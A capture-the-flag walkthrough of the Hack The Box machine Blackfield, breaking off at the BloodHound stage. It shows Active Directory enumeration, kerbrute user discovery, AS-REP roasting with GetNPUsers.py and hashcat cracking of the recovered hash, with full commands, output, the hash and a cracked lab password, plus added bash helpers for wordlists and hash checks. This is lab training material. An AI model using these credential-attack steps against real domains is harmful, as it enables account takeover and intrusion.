This is a Windows machine from Hack The Box (Blackfield, 10.10.10.192).
nmap scan
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ nmap -sV -sC -oA blackfield 10.10.10.192
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 21:19 EDT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.28 seconds
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ nmap -sV -sC -oA -Pn blackfield 10.10.10.192
Output filename begins with '-'. Try '-oA ./-Pn' if you really want it to be named as such.
QUITTING!
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ nmap -sV -sC -oA blackfield 10.10.10.192 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 21:20 EDT
Nmap scan report for 10.10.10.192
Host is up (0.35s latency).
Not shown: 993 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-10 08:20:46Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-09-10T08:21:08
|_ start_date: N/A
|_clock-skew: 7h00m02s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.68 seconds
Using crackmapexec on 445 with a null session (empty username and password); it returns nothing:
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ crackmapexec smb 10.10.10.192 -u "" -p ""
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$
Checking shares without credentials; the DC identifies itself but tears down the null session before listing anything:
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ crackmapexec smb 10.10.10.192 --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [-] Error enumerating shares: STATUS_USER_SESSION_DELETED
┌──(kali㉿kali)-[~/HTB/blackfield]
Add blackfield.local to /etc/hosts (the other entries are left over from earlier boxes):
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.10.175 EGOTISTICAL-BANK.LOCAL
10.10.10.100 active.htb htb
10.10.10.161 htb.local
10.10.10.192 blackfield.local
Try ldapsearch: first the naming contexts (ldapsearch -x -H ldap://10.10.10.192 -s base namingcontexts), then a subtree search for person objects, keeping only sAMAccountName (ldapsearch -x -H ldap://10.10.10.192 -b 'DC=blackfield,DC=local' -s sub '(objectClass=person)' sAMAccountName | grep 'sAMAccountName:' | awk -F ': ' '{print $2}'). The second one returns no names:
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ ldapsearch -x -H ldap://10.10.10.192 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=BLACKFIELD,DC=local
namingcontexts: CN=Configuration,DC=BLACKFIELD,DC=local
namingcontexts: CN=Schema,CN=Configuration,DC=BLACKFIELD,DC=local
namingcontexts: DC=DomainDnsZones,DC=BLACKFIELD,DC=local
namingcontexts: DC=ForestDnsZones,DC=BLACKFIELD,DC=local
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ ldapsearch -x -H ldap://10.10.10.192 -b 'DC=blackfield,DC=local' -s sub '(objectClass=person)' sAMAccountName | grep 'sAMAccountName:' | awk -F ': ' '{print $2}'
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$
Tried again without the grep, and the real reason shows: the server refuses the subtree search until a successful bind has been made, so anonymous LDAP enumeration is out here (the grep had hidden the error):
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ ldapsearch -x -H ldap://10.10.10.192 -b 'DC=blackfield,DC=local' -s sub
# extended LDIF
#
# LDAPv3
# base <DC=blackfield,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A69, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4563
# numResponses: 1
Trying rpcclient with a null session: the connection is accepted, but the enumeration commands are denied.
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ rpcclient 10.10.10.192 -U ''
Password for [WORKGROUP\]:
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> Password for [WORKGROUP\]:
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $>
^C
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ rpcclient 10.10.10.192 -U ''
Password for [WORKGROUP\]:
rpcclient $> netsharenum
command not found: netsharenum
rpcclient $> netshareenum
result was WERR_ACCESS_DENIED
rpcclient $>
Trying GetNPUsers.py against the whole domain. Without a user list it has to query LDAP for accounts with pre-authentication disabled, so it fails on the same anonymous-bind restriction:
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py -dc-ip 10.10.10.192 -request 'blackfield.local/'
Impacket v0.11.0 - Copyright 2023 Fortra
[-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A69, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4563
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$
Did a full TCP port scan; the only addition over the default scan is 5985/tcp (WinRM):
┌──(kali㉿kali)-[~/HTB/Forest]
└─$ nmap -p- -T4 -oA full 10.10.10.192 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 21:55 EDT
Nmap scan report for blackfield.local (10.10.10.192)
Host is up (0.34s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
389/tcp open ldap
445/tcp open microsoft-ds
593/tcp open http-rpc-epmap
3268/tcp open globalcatLDAP
5985/tcp open wsman
Nmap done: 1 IP address (1 host up) scanned in 564.16 seconds
Checked SMB shares with smbclient; the share listing itself works anonymously:
┌──(kali㉿kali)-[~/HTB/Forest]
└─$ smbclient -L //10.10.10.192
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.192 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available
There is a share called forensic. Try connecting to it with a null session:
smbclient //10.10.10.192/forensic -U ""%""
┌──(kali㉿kali)-[~/HTB/Forest]
└─$ smbclient //10.10.10.192/forensic -U ""%""
tree connect failed: NT_STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~/HTB/Forest]
Tried enum4linux: no luck beyond confirming that a null session is accepted and getting the domain SID.
┌──(kali㉿kali)-[~]
└─$ enum4linux -S 10.10.10.192
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Sep 9 23:03:37 2023
=========================================( Target Information )=========================================
Target ........... 10.10.10.192
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on 10.10.10.192 )============================
[E] Can't find workgroup/domain
===================================( Session Check on 10.10.10.192 )===================================
[+] Server 10.10.10.192 allows sessions using username '', password ''
================================( Getting domain SID for 10.10.10.192 )================================
Domain Name: BLACKFIELD
Domain Sid: S-1-5-21-4194615774-2175524697-3563712290
[+] Host is part of a domain (not a workgroup)
=================================( Share Enumeration on 10.10.10.192 )=================================
do_connect: Connection to 10.10.10.192 failed (Error NT_STATUS_IO_TIMEOUT)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.10.10.192
enum4linux complete on Sat Sep 9 23:04:04 2023
Checked profiles$ with a null session (smbclient \\\\10.10.10.192\\profiles$ -U ''), and this one is readable:
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ smbclient \\\\10.10.10.192\\profiles$ -U ''
Password for [WORKGROUP\]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jun 3 12:47:12 2020
.. D 0 Wed Jun 3 12:47:12 2020
AAlleni D 0 Wed Jun 3 12:47:11 2020
ABarteski D 0 Wed Jun 3 12:47:11 2020
ABekesz D 0 Wed Jun 3 12:47:11 2020
ABenzies D 0 Wed Jun 3 12:47:11 2020
ABiemiller D 0 Wed Jun 3 12:47:11 2020
AChampken D 0 Wed Jun 3 12:47:11 2020
ACheretei D 0 Wed Jun 3 12:47:11 2020
ACsonaki D 0 Wed Jun 3 12:47:11 2020
AHigchens D 0 Wed Jun 3 12:47:11 2020
AJaquemai D 0 Wed Jun 3 12:47:11 2020
AKlado D 0 Wed Jun 3 12:47:11 2020
Output all of these directory names to users.txt:
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ more users.txt
AAlleni D 0 Wed Jun 3 12:47:11 2020
ABarteski D 0 Wed Jun 3 12:47:11 2020
ABekesz D 0 Wed Jun 3 12:47:11 2020
ABenzies D 0 Wed Jun 3 12:47:11 2020
ABiemiller D 0 Wed Jun 3 12:47:11 2020
AChampken D 0 Wed Jun 3 12:47:11 2020
Cleaned the file so that only the username column is left (awk '{print $1}' users.txt > cleaned_users.txt), then tidied it by hand in nano:
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ awk '{print $1}' users.txt > cleaned_users.txt
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ nano cleaned_users.txt
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ ls
blackfield.gnmap blackfield.nmap blackfield.xml cleaned_users.txt kerbrute users.txt
┌──(kali㉿kali)-[~/HTB/blackfield]
Added "administrator" to the file, then used kerbrute to see which usernames are valid:
./kerbrute userenum --dc 10.10.10.192 -d blackfield.LOCAL cleaned_users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 09/09/23 - Ronnie Flathers @ropnop
2023/09/09 23:24:27 > Using KDC(s):
2023/09/09 23:24:27 > 10.10.10.192:88
2023/09/09 23:24:33 > [+] VALID USERNAME: [email protected]
2023/09/09 23:24:50 > [+] VALID USERNAME: [email protected]
2023/09/09 23:27:01 > [+] VALID USERNAME: [email protected]
2023/09/09 23:27:01 > [+] VALID USERNAME: [email protected]
We get four valid users: administrator, audit2020, support and svc_backup.
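The users.txt / cleaned_users.txt step above was done with a bare awk and a hand edit. As an added example (not part of the original write-up), the bash helper below does the same job in one go: it takes an smbclient listing of profiles$, keeps only directory names, drops the . and .. entries and the free-space summary line, seeds the list with administrator as was done above, and dedupes case-insensitively. The listing embedded in the script is a constructed sample modelled on the real output; the function and file names are mine.

```shell
#!/usr/bin/env bash
# Added example, not from the original write-up: build a kerbrute username
# wordlist from an smbclient "ls" of the profiles$ share.
set -eu

# Constructed sample of smbclient output (same column layout as the real listing).
SAMPLE_LISTING='  .                                   D        0  Wed Jun  3 12:47:12 2020
  ..                                  D        0  Wed Jun  3 12:47:12 2020
  AAlleni                             D        0  Wed Jun  3 12:47:11 2020
  ABarteski                           D        0  Wed Jun  3 12:47:11 2020
  aalleni                             D        0  Wed Jun  3 12:47:11 2020
  readme.txt                          A       12  Wed Jun  3 12:47:11 2020

		5102079 blocks of size 4096. 1678453 blocks available'

# profiles_to_users: smbclient listing on stdin -> one directory name per line.
# Columns are "<name> <attrs> <size> <date>"; only entries whose attribute
# column contains D (directory) are profile folders. Names containing spaces
# would break the column split; profile folders are derived from
# sAMAccountNames, so that does not happen here.
profiles_to_users() {
  awk '
    NF < 4                       { next }   # blank lines, free-space summary
    $1 == "." || $1 == ".."      { next }   # smbclient self/parent entries
    $2 ~ /^[A-Z]+$/ && $2 ~ /D/  { print $1 }
  '
}

# dedupe_ci: drop case-insensitive duplicates, keeping the first spelling seen.
# Kerberos principal names are case-insensitive, so AAlleni and aalleni would
# cost two AS-REQs for one answer.
dedupe_ci() {
  awk '{ k = tolower($0) } !(k in seen) { seen[k] = 1; print }'
}

# build_wordlist <listing-file> <out-file>: full pipeline plus the seed user
# that was added by hand above. Prints the number of names written.
build_wordlist() {
  { profiles_to_users < "$1"; printf 'administrator\n'; } | dedupe_ci > "$2"
  wc -l < "$2" | tr -d ' '
}

# Stand-alone demo on the constructed sample.
tmp=$(mktemp -d)
printf '%s\n' "$SAMPLE_LISTING" > "$tmp/listing.txt"
n=$(build_wordlist "$tmp/listing.txt" "$tmp/cleaned_users.txt")
echo "wrote $n usernames to $tmp/cleaned_users.txt:"
cat "$tmp/cleaned_users.txt"
# Next step against the DC: ./kerbrute userenum --dc 10.10.10.192 -d blackfield.LOCAL "$tmp/cleaned_users.txt"
```

To use it on a real listing, redirect the smbclient session output to a file (smbclient ... -c 'ls' > listing.txt) and call build_wordlist on it.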
We try GetNPUsers.py against each one (blackfield.LOCAL/audit2020 and so on), pressing Enter at the password prompt so it falls back to requesting a TGT without pre-authentication:
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py blackfield.LOCAL/audit2020
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Cannot authenticate audit2020, getting its TGT
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py blackfield.LOCAL/support
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Cannot authenticate support, getting its TGT
[email protected]:3c5c336ce929e0beda492ad47245cc2a$2cb24cd5709ede658b22a57e3379eb58f75b456581f7774e0a574206e84fd9207af192d18a0cd36d0092a59a59493040b6be0e81201dac42c805b16a026e23b6f7ab4f0661046fe769d6c8b8efcee2783b33041a147e5c22b16f14b92b85036062f8280e875a44ec0fb8c66e50d457e6b5825327ca52d8090837474f2f6fc6f234bb9151ed684a148833e5043e7b7e01840fbad876a22cdb815c77d74024d297c924cfc18eb42f9ff189abe04e6e2d6cf3d0fd4011e997ed472562a95294e4c3f08005ebb09495889a080e5741f9c6efe84a31daa26735e78f64aa2886c1fce0f827c267bc6d03b8e3a560f4ea73f364c4a1f2ab
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py blackfield.LOCAL/svc_backup
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Cannot authenticate svc_backup, getting its TGT
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
Only support has pre-authentication disabled, so we get an AS-REP hash for it. We try to crack it with hashcat; the mode for an etype 23 AS-REP is 18200:
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ cd ~/usr/bin
cd: no such file or directory: /home/kali/usr/bin
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ cd /usr/bin
┌──(kali㉿kali)-[/usr/bin]
└─$ ./hashcat --example-hashes | less
Hash mode #18200
Name................: Kerberos 5, etype 23, AS-REP
Category............: Network Protocol
Slow.Hash...........: No
Password.Len.Min....: 0
Password.Len.Max....: 256
Salt.Type...........: Embedded
Salt.Len.Min........: 0
Salt.Len.Max........: 256
Kernel.Type(s)......: pure, optimized
Example.Hash.Format.: plain
Example.Hash........: [email protected]:3e156ada591263b8a...102ac [Truncated, use --mach for full length]
Example.Pass........: hashcat
Benchmark.Mask......: ?b?b?b?b?b?b?b
Autodetect.Enabled..: Yes
Self.Test.Enabled...: Yes
Potfile.Enabled.....: Yes
Custom.Plugin.......: No
Plaintext.Encoding..: ASCII, HEX
Copy the hash to a file:
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ cat blackfield
$krb5asrep$23$[email protected]:3c5c336ce929e0beda492ad47245cc2a$2cb24cd5709ede658b22a57e3379eb58f75b456581f7774e0a574206e84fd9207af192d18a0cd36d0092a59a59493040b6be0e81201dac42c805b16a026e23b6f7ab4f0661046fe769d6c8b8efcee2783b33041a147e5c22b16f14b92b85036062f8280e875a44ec0fb8c66e50d457e6b5825327ca52d8090837474f2f6fc6f234bb9151ed684a148833e5043e7b7e01840fbad876a22cdb815c77d74024d297c924cfc18eb42f9ff189abe04e6e2d6cf3d0fd4011e997ed472562a95294e4c3f08005ebb09495889a080e5741f9c6efe84a31daa26735e78f64aa2886c1fce0f827c267bc6d03b8e3a560f4ea73f364c4a1f2ab
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ clear
Crack it with hashcat against rockyou; it comes back as #00^BlackKnight:
┌──(kali㉿kali)-[/usr/bin]
└─$ ./hashcat -m 18200 /home/kali/HTB/blackfield/blackfield /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 4.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-sandybridge-11th Gen Intel(R) Core(TM) i7-1160G7 @ 1.20GHz, 2815/5694 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
[email protected]:3c5c336ce929e0beda492ad47245cc2a$2cb24cd5709ede658b22a57e3379eb58f75b456581f7774e0a574206e84fd9207af192d18a0cd36d0092a59a59493040b6be0e81201dac42c805b16a026e23b6f7ab4f0661046fe769d6c8b8efcee2783b33041a147e5c22b16f14b92b85036062f8280e875a44ec0fb8c66e50d457e6b5825327ca52d8090837474f2f6fc6f234bb9151ed684a148833e5043e7b7e01840fbad876a22cdb815c77d74024d297c924cfc18eb42f9ff189abe04e6e2d6cf3d0fd4011e997ed472562a95294e4c3f08005ebb09495889a080e5741f9c6efe84a31daa26735e78f64aa2886c1fce0f827c267bc6d03b8e3a560f4ea73f364c4a1f2ab:#00^BlackKnight
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: [email protected]:3c5c336ce929...a1f2ab
Time.Started.....: Sat Sep 9 23:39:08 2023 (30 secs)
Time.Estimated...: Sat Sep 9 23:39:38 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 465.6 kH/s (2.91ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 14336000/14344385 (99.94%)
Rejected.........: 0/14336000 (0.00%)
Restore.Point....: 14333952/14344385 (99.93%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: #1crapper -> #!hrvert
Hardware.Mon.#1..: Util: 73%
Started: Sat Sep 9 23:39:06 2023
Stopped: Sat Sep 9 23:39:39 2023
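The copy-the-hash step above was done by hand. As an added example (not from the original write-up), the bash helper below filters a GetNPUsers.py run down to the hash lines, checks each one against the layout hashcat mode 18200 expects, and writes the good ones to a file, so a stray log prefix or a john-format line is caught before hashcat rejects it. The log it parses is a constructed sample whose hex is filler, not a real ticket; the function names are mine.

```shell
#!/usr/bin/env bash
# Added example, not from the original write-up: save AS-REP hashes from
# GetNPUsers.py output and validate them before handing them to hashcat.
set -eu

# Constructed sample of a GetNPUsers.py run; the hex below is filler.
SAMPLE_LOG='Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for audit2020
[-] User audit2020 does not have UF_DONT_REQUIRE_PREAUTH set
[*] Getting TGT for support
$krb5asrep$23$support@BLACKFIELD.LOCAL:0123456789abcdef0123456789abcdef$00112233445566778899aabbccddeeff0011223344556677
[*] Getting TGT for svc_backup
[-] User svc_backup does not have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$support@BLACKFIELD.LOCAL:0123456789abcdef0123456789abcdef$0011223344556677'

# check_asrep <line>: accept only the hashcat (-m 18200) layout
#   $krb5asrep$23$<user>@<REALM>:<32 hex: RC4-HMAC checksum>$<hex: enc-part>
# etype 23 is RC4-HMAC; the 16-byte checksum sits before the second "$".
# The john layout ($krb5asrep$user@REALM:...) lacks the "23$" and is rejected,
# as is anything with a "[*]" prefix pasted in by mistake.
check_asrep() {
  printf '%s\n' "$1" \
    | grep -Eq '^\$krb5asrep\$23\$[^@:$]+@[^:$]+:[0-9a-fA-F]{32}\$[0-9a-fA-F]+$'
}

# save_asrep_hashes <log-file> <out-file>: write valid hashes, one per line,
# and print how many were kept. Malformed hash lines go to stderr so a paste
# error is not silently dropped.
save_asrep_hashes() {
  : > "$2"
  kept=0
  while IFS= read -r line; do
    case $line in
      '$krb5asrep$'*)
        if check_asrep "$line"; then
          printf '%s\n' "$line" >> "$2"
          kept=$((kept + 1))
        else
          printf 'rejected malformed hash line: %s\n' "$line" >&2
        fi ;;
    esac
  done < "$1"
  echo "$kept"
}

# Stand-alone demo on the constructed log.
tmp=$(mktemp -d)
printf '%s\n' "$SAMPLE_LOG" > "$tmp/getnpusers.log"
n=$(save_asrep_hashes "$tmp/getnpusers.log" "$tmp/asrep.hashes")
echo "kept $n hash(es) in $tmp/asrep.hashes"
# Then: hashcat -m 18200 "$tmp/asrep.hashes" /usr/share/wordlists/rockyou.txt
```

In practice, run GetNPUsers.py with its output redirected to a file (or use its -outputfile option) and point save_asrep_hashes at that file; the rejected line in the sample shows what a john-format hash looks like if -format john was used by mistake.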
Try crackmapexec with the support credentials and we can enumerate the shares, but forensic is still not readable:
└─$ crackmapexec smb 10.10.10.192 --shares -u support -p '#00^BlackKnight'
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
SMB 10.10.10.192 445 DC01 [+] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ Remote Admin
SMB 10.10.10.192 445 DC01 C$ Default share
SMB 10.10.10.192 445 DC01 forensic Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON READ Logon server share
SMB 10.10.10.192 445 DC01 profiles$ READ
SMB 10.10.10.192 445 DC01 SYSVOL READ Logon server share
Let's try WinRM with the same credentials: no luck, support cannot log in that way.
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ crackmapexec winrm 10.10.10.192 -u support -p '#00^BlackKnight'
SMB 10.10.10.192 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
HTTP 10.10.10.192 5985 DC01 [*] http://10.10.10.192:5985/wsman
WINRM 10.10.10.192 5985 DC01 [-] BLACKFIELD.local\support:#00^BlackKnight
┌──(kali㉿kali)-[~/HTB/blackfield]
Try rpcclient with the support credentials, then enumerate the domain users with enumdomusers; this time we get a list of usernames:
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[audit2020] rid:[0x44f]
user:[support] rid:[0x450]
user:[BLACKFIELD764430] rid:[0x451]
user:[BLACKFIELD538365] rid:[0x452]
user:[BLACKFIELD189208] rid:[0x453]
user:[BLACKFIELD404458] rid:[0x454]
user:[BLACKFIELD706381] rid:[0x455]
user:[BLACKFIELD937395] rid:[0x456]
user:[BLACKFIELD553715] rid:[0x457]
user:[BLACKFIELD840481] rid:[0x458]
user:[BLACKFIELD622501] rid:[0x459]
user:[BLACKFIELD787464] rid:[0x45a]
user:[BLACKFIELD163183] rid:[0x45b]
user:[BLACKFIELD869335] rid:[0x45c]
user:[BLACKFIELD319016] rid:[0x45d]
We output this to a file and clean it so we only have the usernames. Then we run GetNPUsers.py over each user in a bash loop, as below (GetNPUsers.py also takes a -usersfile argument, which does the same thing in a single run):
while read -r user; do
./GetNPUsers.py blackfield.LOCAL/$user -no-pass -dc-ip 10.10.10.192
done < /home/kali/HTB/blackfield/cleanusers2.txt
We get the output below: no hash for any of them, so no luck.
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for BLACKFIELD764430
[-] User BLACKFIELD764430 doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for BLACKFIELD538365
[-] User BLACKFIELD538365 doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for BLACKFIELD189208
[-] User BLACKFIELD189208 doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for BLACKFIELD404458
[-] User BLACKFIELD404458 doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
Next we try BloodHound. I want to use the BloodHound 3 GUI, so the collector has to emit the matching JSON version; the 1.1.x series of bloodhound.py does that (newer releases target BloodHound 4), hence the pin below.
bloodhound.py is the Python port of SharpHound: it runs from the Linux machine and writes JSON that we can import into the BloodHound GUI.
pip install BloodHound==1.1.1
Add the pip user bin directory to PATH:
export PATH=$PATH:/home/kali/.local/bin
Then run the collector: bloodhound-python -u support -p '#00^BlackKnight' -ns 10.10.10.192 -d blackfield.local -c all
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ bloodhound-python -u support -p '#00^BlackKnight' -ns 10.10.10.192 -d blackfield.local -c all
INFO: Found AD domain: blackfield.local
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 315 users
INFO: Connecting to GC LDAP server: dc01.blackfield.local
INFO: Found 51 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.BLACKFIELD.local
INFO: Done in 01M 12S
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ ls
20230910090640_computers.json 20230910090640_users.json blackfield.nmap cleanusers2.txt users.txt
20230910090640_domains.json blackfield blackfield.xml kerbrute
20230910090640_groups.json blackfield.gnmap cleaned_users.txt users2.txt
┌──(kali㉿kali)-[~/HTB/blackfield]
Start neo4j, then BloodHound, and load the JSON files.
neo4j
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ sudo neo4j console
[sudo] password for kali:
Sorry, try again.
[sudo] password for kali:
Active database: graph.db
Directories in use:
home: /var/lib/neo4j
config: /etc/neo4j
logs: /var/log/neo4j
plugins: /var/lib/neo4j/plugins
import: /var/lib/neo4j/import
data: /var/lib/neo4j/data
certificates: /var/lib/neo4j/certificates
run: /var/run/neo4j
Starting Neo4j.
WARNING: Max 1024 open files allowed, minimum of 40000 recommended. See the Neo4j manual.
2023-09-10 13:10:15.848+0000 INFO ======== Neo4j 3.5.35 ========
2023-09-10 13:10:15.891+0000 INFO Starting...
2023-09-10 13:10:20.194+0000 INFO Bolt enabled on 127.0.0.1:7687.
2023-09-10 13:10:23.362+0000 INFO Started.
2023-09-10 13:10:25.396+0000 INFO Remote interface available at http://localhost:7474/
2023-09-10 13:10:47.620+0000 WARN The client is unauthorized due to authentication failure.
bloodhound
└─$ ls
BloodHound-3.0.5 BloodHound-3.0.5.zip BloodHound-linux-x64 'BloodHound-linux-x64(1).zip'
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3]
└─$ cd BloodHound-linux-x64
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-linux-x64]
└─$ ls
BloodHound icudtl.dat libvk_swiftshader.so locales swiftshader
chrome_100_percent.pak libEGL.so libvulkan.so resources v8_context_snapshot.bin
chrome_200_percent.pak libffmpeg.so LICENSE resources.pak version
chrome-sandbox libGLESv2.so LICENSES.chromium.html snapshot_blob.bin vk_swiftshader_icd.json
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-linux-x64]
└─$ ./BloodHound
(node:358673) [DEP0005] DeprecationWarning: Buffer() is deprecated due to security and usability issues. Please use the Buffer.alloc(), Buffer.allocUnsafe(), or Buffer.from() methods instead.
After loading the data into BloodHound I am going to try aclpwn to see whether there is an ACL path from support to the domain:
┌──(kali㉿kali)-[~/HTB/blackfield]
